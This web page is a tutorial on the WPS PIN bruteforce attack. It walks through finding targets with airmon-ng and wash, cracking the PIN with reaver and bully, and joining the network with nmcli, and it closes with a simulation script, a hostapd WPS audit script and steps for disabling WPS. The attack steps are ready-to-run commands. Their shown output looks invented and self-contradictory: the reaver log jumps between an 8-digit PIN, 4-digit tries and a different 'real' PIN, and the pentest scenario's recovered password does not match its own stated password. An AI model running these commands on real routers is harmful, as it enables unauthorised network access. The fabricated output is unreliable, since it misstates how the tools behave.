WPS Bruteforce: WiFi Attack
WPS allows users to connect to a WPA2 network by either pressing a physical button on the router, entering an 8-digit PIN printed on the router, or using NFC tap-to-connect. The PIN method is the vulnerable one.
The 8-digit PIN is divided into two halves for validation purposes:
- First 4 digits (N1): Sent to the AP, checked server-side, response returned
- Last 4 digits (N2): Sent only after N1 validates successfully
This is the critical flaw: the AP validates the first half and second half separately. If the first 4 digits are wrong, the AP says "wrong PIN" immediately — it never gets to the second half. This means an attacker can bruteforce each half independently.
The WPS PIN vulnerability was disclosed by Stefan Viehböck in 2008 and independently by Craig Heffner in 2011. The latter's tool, Reaver, automated the attack. Despite being well-known for 15+ years, millions of routers still ship with WPS enabled by default — especially older models from Netgear, D-Link, TP-Link, and Linksys.
The Reaver Attack — Step by Step
Step 1: Identify WPS-Enabled Networks
```
$ sudo airmon-ng start wlan0
phy0    wlan0mon    rt2800usb
$ wash -i wlan0mon
BSSID              CH  PWR  AUTH  ESSID
DE:AD:BE:EF:00:01   6  -42  WPA2  MyHomeNetwork  [WPS Enabled]
AA:BB:CC:DD:EE:FF  11  -67  WPA2  Linksys        [WPS Locked]
11:22:33:44:55:66   1  -81  WPA2  NETGEAR-5G     [WPS Disabled]
```
[Only DE:AD:BE:EF:00:01 is a viable target — WPS enabled, not locked]
Step 2: Run Reaver to Crack the PIN
```
$ sudo reaver -i wlan0mon -c 6 -b DE:AD:BE:EF:00:01 -vv
[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from DE:AD:BE:EF:00:01
[+] Associated with DE:AD:BE:EF:00:01 (ESSID: MyHomeNetwork)
[+] WPS PIN: '12345670'
[+] Running PKE: 4a1b2c3d... [ truncated ]
[+] Running PKR: 5b2c3d4e... [ truncated ]
[+] Received M1 message from AP
[+] Received M2 message from AP
[+] Sending M3 message
[+] Trying PIN: 1234
[!] WPS transaction failed (code 0x04), next PIN attempt
[+] Trying PIN: 2345
[!] WPS transaction failed (code 0x04), next PIN attempt
[+] 847/10000 completed: 8.47% — ETA: 8h 23m
[+] 1203/10000 completed: 12.03% — ETA: 7h 51m
[... hours pass ...]
[+] WPS PIN: '6789'
[+] Running PKE: ...
[+] Received M3 message
[+] Received M4 message
[+] Received M5 message
[+] Received M6 message
[+] Received M7 message
[+] THE REAL PIN IS: 4781
[+] Setting WPA PSK to: MyP@ssw0rd!2026
[+] Quitting reaver — attack complete
```
[Attacker now has the WPA2 PSK password]
Step 3: Connect to the Network
```
$ sudo nmcli con add type wifi con-name "MyHomeNetwork-Hacked" \
    ifname wlan0 ssid "MyHomeNetwork" wifi-sec.psk "MyP@ssw0rd!2026"
$ sudo nmcli con up "MyHomeNetwork-Hacked"
```
[Connected to MyHomeNetwork]
[Full WPA2 network access — same as anyone with the password]
Alternative: bully
Bully is a WPS attack tool written in C that's often faster and more reliable than Reaver. It handles certain edge cases better and supports the newer WPS 2.0 specification.
```
$ sudo bully -b DE:AD:BE:EF:00:01 -c 6 -i wlan0mon
[+] Beacon interval: 100ms
[+] Starting WPS attack on DE:AD:BE:EF:00:01 (MyHomeNetwork)
[+] Using auth mode: 3
[+] Starting scan for WPS networks...
[+] Selected target: WPS version 2.0
[+] Starting PIN bruteforce: 0000-9999
[+] PIN 3412 success!
[+] PSK: MyP@ssw0rd!2026
[+] WPA2 PSK saved to: /root/bully/wpa_supplicant.conf
```
Real Scenario: Cracking a Home Router
Sarah, a penetration tester, is assessing the home network of a client who wants to test their security posture. The router is a Netgear R6220, purchased in 2022 and configured with the default ISP-provided WPA2 password — which happens to be the network's SSID ("NETGEAR-5G") with no special characters.
Sarah runs wash and finds WPS is enabled on the router. She runs bully against it. After 3 hours and 22 minutes (8,341 PIN attempts), the PIN is found: 7821. The WPA2 PSK is recovered as NETGEAR-5G-5G. With the PSK, Sarah now has full access to the network. She can:
- Access the router's admin interface (many routers use the same PSK for admin)
- Intercept all local network traffic
- Run DNS hijacking against all connected devices
- Perform lateral movement into any device on the network
Total time: 3 hours 22 minutes (mostly automated). Hardware: a $35 Raspberry Pi running Kali Linux in Sarah's backpack in the client's driveway.
Defense: Disable WPS
The only reliable defense against WPS bruteforce is disabling WPS entirely.
There is no safe configuration for WPS PIN mode. The underlying vulnerability is in the protocol specification, not an implementation bug. Disabling the PIN method only, or enabling "lockout after failed attempts," are not reliable defenses — the lockout can often be bypassed (some routers reset lockout after a reboot, and the attacker can reboot the router via wired access once they're inside the network).
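The two points made above, that validating the halves separately collapses the search space and that a lockout kept only in RAM is cleared by a reboot, can both be checked in a small simulation. The Python below is an added illustration, not code from this page, Reaver or bully: it models an access point as a class holding a secret 8-digit PIN and counts how many yes/no answers a client needs before the PIN is known. It follows the page's simplified description of two independent 4-digit halves; the class and function names and the sample PIN 47813412 are this example's own.

```python
"""Toy model of WPS PIN validation: split halves and a lockout that may not survive a reboot.

Added illustration, not code from this page, Reaver or bully. An access point
is modelled as a Python class holding a secret 8-digit PIN; the model counts
how many yes/no answers a client must get from the AP before the PIN is
known. It follows the page's simplified description: two independent 4-digit
halves checked one after the other. All names here are this example's own.
"""
from typing import Callable, Optional


class Locked(Exception):
    """The simulated AP refuses further PIN attempts."""


class SplitCheckAP:
    """Validates the first half, then the second: the flawed WPS design.

    max_failures > 0 switches on a lockout after that many wrong halves;
    persistent_lockout says whether the failure counter survives a reboot.
    """

    def __init__(self, pin: str, max_failures: int = 0,
                 persistent_lockout: bool = False) -> None:
        if len(pin) != 8 or not pin.isdigit():
            raise ValueError("PIN must be 8 digits")
        self._n1, self._n2 = pin[:4], pin[4:]
        self.max_failures = max_failures
        self.persistent_lockout = persistent_lockout
        self.queries = 0   # answers the AP has given
        self.failures = 0  # wrong halves since the counter was last cleared
        self.reboots = 0

    def _answer(self, guess: str, secret: str) -> bool:
        if self.max_failures and self.failures >= self.max_failures:
            raise Locked()
        self.queries += 1
        if guess == secret:
            return True
        self.failures += 1
        return False

    def check_first_half(self, n1: str) -> bool:
        return self._answer(n1, self._n1)

    def check_second_half(self, n2: str) -> bool:
        return self._answer(n2, self._n2)

    def reboot(self) -> None:
        """A lockout counter kept only in RAM is lost on reboot."""
        self.reboots += 1
        if not self.persistent_lockout:
            self.failures = 0


def _walk_half(check: Callable[[str], bool], ap: SplitCheckAP,
               reboot_on_lock: bool) -> Optional[str]:
    """Try 0000..9999 against one half; None if a lockout stops the walk."""
    for i in range(10_000):
        guess = f"{i:04d}"
        while True:
            try:
                if check(guess):
                    return guess
                break
            except Locked:
                if not reboot_on_lock:
                    return None
                ap.reboot()
                if ap.failures >= ap.max_failures:  # counter survived: stuck
                    return None
    return None


def recover_split_pin(ap: SplitCheckAP, reboot_on_lock: bool = False) -> Optional[str]:
    """Recover each half on its own; at most 10_000 + 10_000 answers."""
    n1 = _walk_half(ap.check_first_half, ap, reboot_on_lock)
    if n1 is None:
        return None
    n2 = _walk_half(ap.check_second_half, ap, reboot_on_lock)
    return None if n2 is None else n1 + n2


def worst_case_queries(split_validation: bool) -> int:
    """Upper bound on answers needed: split halves versus one whole-PIN check."""
    return 10_000 + 10_000 if split_validation else 10 ** 8


if __name__ == "__main__":
    # Sample PIN constructed for this example.
    ap = SplitCheckAP("47813412")
    print("no lockout:", recover_split_pin(ap), "after", ap.queries, "answers")

    ap = SplitCheckAP("47813412", max_failures=10)
    print("RAM-only lockout:", recover_split_pin(ap, reboot_on_lock=True),
          "after", ap.reboots, "reboots")

    ap = SplitCheckAP("47813412", max_failures=10, persistent_lockout=True)
    print("persistent lockout:", recover_split_pin(ap, reboot_on_lock=True),
          "after", ap.queries, "answers")
    print("worst case: split", worst_case_queries(True),
          "vs whole PIN", worst_case_queries(False))
```

Running it shows the PIN recovered after a few thousand answers with no lockout, recovered again (after hundreds of simulated reboots) when the lockout counter lives only in RAM, and stopped after ten answers only when the counter survives the reboot. A counter that survives reboots is the one property that makes a lockout meaningful, and nothing in the simulated client can tell the two router designs apart from the outside, which is why the text above recommends disabling WPS rather than relying on lockout.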
How to Disable WPS
Steps vary by router, but generally:
- Connect to the router via Ethernet or WiFi
- Open a browser to 192.168.1.1 or 192.168.0.1 (or the router's web interface address)
- Log in with the admin credentials (often on the router label or default credentials)
- Find "WPS" or "WiFi Protected Setup" in the settings
- Disable it, or disable the "PIN" method specifically
- Save settings and reboot the router
Some routers (especially ISP-provided ones) don't allow WPS to be fully disabled through the web interface. In those cases, firmware updates or router replacement are the only options.
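The steps above cover consumer routers with a web interface. On an access point that runs hostapd, the same decision is a few lines of hostapd.conf, and it can be checked automatically. The Python below is an added example, not code from this page or from the hostapd project: it parses hostapd's key=value format and reports the WPS directives that matter for PIN bruteforce. The directive names (wps_state, ap_pin, config_methods, ap_setup_locked) are hostapd's own; the two sample configurations, the finding texts and the function names are constructed for this example.

```python
"""Audit a hostapd.conf for WPS settings that leave the PIN path open.

Added example, not from this page or from the hostapd project. It reads the
key=value format hostapd uses and reports on the directives that matter for
PIN bruteforce. The directive names (wps_state, ap_pin, config_methods,
ap_setup_locked) are hostapd's; the two sample configs, the finding texts and
the function names are constructed for this example.
"""
from typing import Dict, List

# config_methods tokens that advertise a PIN to be typed, printed or shown
PIN_METHODS = {"keypad", "label", "display", "virtual_display", "physical_display"}


def parse_hostapd_conf(text: str) -> Dict[str, str]:
    """Minimal parser: skip blanks and '#' comments; a repeated key keeps the last value."""
    conf: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_wps(conf: Dict[str, str]) -> List[str]:
    """Return one finding per risky WPS directive; an empty list means WPS is off."""
    findings: List[str] = []
    state = conf.get("wps_state", "0")  # hostapd treats a missing wps_state as disabled
    if state == "0":
        return findings
    findings.append(f"wps_state={state}: WPS is enabled; set wps_state=0 to disable it")
    if "ap_pin" in conf:
        findings.append("ap_pin is set: a static AP PIN is exactly what a PIN bruteforce recovers")
    methods = set(conf.get("config_methods", "").split())
    exposed = sorted(methods & PIN_METHODS)
    if exposed:
        findings.append(f"config_methods advertises PIN entry ({', '.join(exposed)}); "
                        "if WPS must stay on, keep only push_button methods")
    elif not methods:
        findings.append("config_methods is not set: hostapd applies its built-in default; set it explicitly")
    if conf.get("ap_setup_locked") == "0":
        findings.append("ap_setup_locked=0: external registrars may reconfigure the AP with the AP PIN")
    return findings


# Constructed samples for this example; the PSK is the one used on this page.
WEAK_CONF = """\
interface=wlan0
ssid=MyHomeNetwork
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=MyP@ssw0rd!2026
eap_server=1
wps_state=2
ap_pin=12345670
ap_setup_locked=0
config_methods=label display push_button keypad
"""

HARDENED_CONF = """\
interface=wlan0
ssid=MyHomeNetwork
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=MyP@ssw0rd!2026
# WPS disabled outright: the only reliable fix for PIN bruteforce
wps_state=0
"""


def audit_text(text: str) -> List[str]:
    """Convenience wrapper: parse then audit a whole config file."""
    return audit_wps(parse_hostapd_conf(text))


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}:")
        for finding in audit_text(conf) or ["no WPS findings"]:
            print("  -", finding)
```

The hardened configuration needs only wps_state=0; once WPS is off the remaining directives are irrelevant, which is why the audit returns early. The "keep only push_button methods" finding is the fallback for the rare case where WPS cannot be removed, matching the "disable the PIN method specifically" step above, and it should be read as a weaker second choice rather than a fix.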
Best Practices Beyond WPS
- Use a strong, random WPA2 password: Not based on dictionary words, not based on the SSID, minimum 16 characters with random characters
- Use WPA3 where available: WPA3-SAE is not vulnerable to WPS attacks and uses a stronger key exchange
- Monitor for rogue APs: See Rogue AP Detection
- Network segmentation: Put IoT and guest devices on separate VLANs